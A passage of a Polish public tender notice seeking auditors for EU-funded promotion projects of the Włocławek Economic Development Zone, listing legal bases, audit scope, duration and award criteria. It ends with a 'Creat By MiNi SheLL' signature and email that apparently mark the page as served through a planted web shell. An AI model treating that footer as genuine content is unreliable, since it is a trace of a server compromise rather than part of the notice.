1)czy Beneficjent realizuje projekt zgodnie z umową o dofinansowanie i wnioskiem o dofinansowanie oraz z obowiązującymi przepisami prawa, w tym m.in. z:
a)	Rozporządzeniem Rady (WE) nr 1083/2006 z dnia 11 lipca 2006r ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego Europejskiego Funduszu Społecznego oraz Funduszu Spójności i uchylającym rozporządzenie nr 1260/1999.
b)	Rozporządzeniem (WE) nr 1081/2006 Parlamentu Europejskiego i Rady z dnia 5 lipca 2006 r w sprawie Europejskiego Funduszu Rozwoju Regionalnego i uchylającym rozporządzenie (WE) nr 1783/1999,
c)	Rozporządzenia Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006r. ustanawiające szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 1083/2006 ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz rozporządzenia (WE) nr 1080/2006 w sprawie Europejskiego Funduszu Rozwoju Regionalnego,
d)	ustawą z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (Dz. U. 2006 nr 227, poz.1658 z późn. zm.),
e)	ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj D.U.2007 Nr 223, poz.1655),
f)	ustawą z dnia 29 września 1994 r o rachunkowości (Dz. U. 1994 Nr 121 poz 591 z późn. zm.),

oraz z:
g)	Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013 przyjętym Uchwałą Nr 70/892/07 przez Zarząd Województwa Kujawsko-Pomorskiego z dnia 23 października 2007 r. z późn. zm.
h)	Szczegółowym Opisem Priorytetów Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007 -2013,
i)	Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013,
2)	czy procedury kontroli wewnętrznej Beneficjenta zapewniają prawidłowość realizacji  projektu, rzetelność wniosków o płatność, oraz, że ponoszone wydatki są kwalifikowane,
3)	czy Beneficjent posiada odpowiednie procedury finansowo-księgowe oraz procedury dotyczące, w odniesieniu do każdej operacji i stosownie do potrzeb, specyfikacji technicznej, planu finansowego, dokumentacji przyznania pomocy, dokumentacji z przeprowadzonego postępowania o udzielenie zamówienia publicznego, sprawozdania z postępu prac oraz sprawozdań z przeprowadzonych weryfikacji i audytów,
4)	prowadzenia przez Beneficjenta odrębnej ewidencji księgowej na potrzeby projektu,
5)	kwalifikowalności wydatków oraz sposobu ich dokumentowania,
6)	zgodność wniosków o płatność z księgami rachunkowymi Beneficjenta 
w części dotyczącej projektu,
7)	wiarygodności wniosków o płatność w zakresie sprawozdawczości 
z realizacji projektu, odnośnie danych rzeczowych oraz osiągania zakładanych celów i wskaźników,
8)	czy Beneficjent wdrożył zalecenia przeprowadzonych kontroli oraz usunął ewentualne nieprawidłowości,
9)	systemu archiwizacji dokumentacji zgromadzonej w ramach realizowanego projektu,
10) czy Beneficjent, w zakresie informacji i promocji, stosuje się do 
      zapisów zawartych w umowie o dofinansowanie projektu,
2. W/w zakres audytu projektu jest wymaganym minimum. Wykonawca może rozszerzyć zakres audytu o inne elementy, które jego zdaniem powinny zostać poddane audytowi po uzyskaniu zgody Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Metoda badania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III - Promocja terenów inwestycyjnych Włocławskiej Strefy Rozwoju Gospodarczego podczas Międzynarodowych Targów Nieruchomości Inwestycyjnych Expo Real 2010 - Monachium Niemcy, październik 2010 roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III - Promocja terenów inwestycyjnych Włocławskiej Strefy Rozwoju Gospodarczego podczas Międzynarodowych Targów Nieruchomości Inwestycyjnych Expo Real 2010 - Monachium Niemcy, październik 2010 roku - złożono wniosek 
o dofinansowanie projektu, poniesiono już powyżej 50% kosztów kwalifikowanych 
Oś priorytetowa 5 Wzmocnienie konkurencyjności przedsiębiorstw
Działanie 5.5. Promocja i rozwój markowych produktów
Okres realizacji projektu  październik - listopad 2010 r.
Koszt projektu    72.611,74 zł brutto.
Koszt kwalifikowany  72.611,74  zł brutto.
Kwota dofinansowania   61.719,98 zł brutto.
Szczegółowy opis przedmiotu zamówienia:
1.  Audyt obejmuje przede wszystkim sprawdzenie:
1)	czy Beneficjent realizuje projekt zgodnie z umową o dofinansowanie i wnioskiem 
o dofinansowanie oraz z obowiązującymi przepisami prawa, w tym m.in. z:
a)	Rozporządzeniem Rady (WE) nr 1083/2006 z dnia 11 lipca 2006r ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego Europejskiego Funduszu Społecznego oraz Funduszu Spójności i uchylającym rozporządzenie nr 1260/1999.
b)	Rozporządzeniem (WE) nr 1081/2006 Parlamentu Europejskiego i Rady z dnia 5 lipca 2006 r w sprawie Europejskiego Funduszu Rozwoju Regionalnego i uchylającym rozporządzenie (WE) nr 1783/1999,
c)	Rozporządzenia Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006r. ustanawiające szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 1083/2006 ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz rozporządzenia (WE) nr 1080/2006 w sprawie Europejskiego Funduszu Rozwoju Regionalnego,
d)	ustawą z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (Dz. U. 2006 nr 227, poz.1658 z późn. zm.),
e)	ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj D.U.2007 Nr 223, poz.1655),
f)	ustawą z dnia 29 września 1994 r o rachunkowości (Dz. U. 1994 Nr 121 poz 591 z późn. zm.),

oraz z:
g)	Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013 przyjętym Uchwałą Nr 70/892/07 przez Zarząd Województwa Kujawsko-Pomorskiego z dnia 23 października 2007 r. z późn. zm.
h)	Szczegółowym Opisem Priorytetów Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007 -2013,
i)	Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013,
2)	czy procedury kontroli wewnętrznej Beneficjenta zapewniają prawidłowość realizacji  projektu, rzetelność wniosków o płatność, oraz, że ponoszone wydatki są kwalifikowane,
3)	czy Beneficjent posiada odpowiednie procedury finansowo-księgowe oraz procedury dotyczące, w odniesieniu do każdej operacji i stosownie do potrzeb, specyfikacji technicznej, planu finansowego, dokumentacji przyznania pomocy, dokumentacji z przeprowadzonego postępowania o udzielenie zamówienia publicznego, sprawozdania z postępu prac oraz sprawozdań z przeprowadzonych weryfikacji i audytów,
4)	prowadzenia przez Beneficjenta odrębnej ewidencji księgowej na potrzeby projektu,
5)	kwalifikowalności wydatków oraz sposobu ich dokumentowania,
6)	zgodność wniosków o płatność z księgami rachunkowymi Beneficjenta 
w części dotyczącej projektu,
7)	wiarygodności wniosków o płatność w zakresie sprawozdawczości 
z realizacji projektu, odnośnie danych rzeczowych oraz osiągania zakładanych celów i wskaźników,
8)	czy Beneficjent wdrożył zalecenia przeprowadzonych kontroli oraz usunął ewentualne nieprawidłowości,
9)	systemu archiwizacji dokumentacji zgromadzonej w ramach realizowanego projektu,
10) czy Beneficjent, w zakresie informacji i promocji, stosuje się do 
      zapisów zawartych w umowie o dofinansowanie projektu,
2. W/w zakres audytu projektu jest wymaganym minimum. Wykonawca może rozszerzyć zakres audytu o inne elementy, które jego zdaniem powinny zostać poddane audytowi po uzyskaniu zgody Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Metoda badania - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com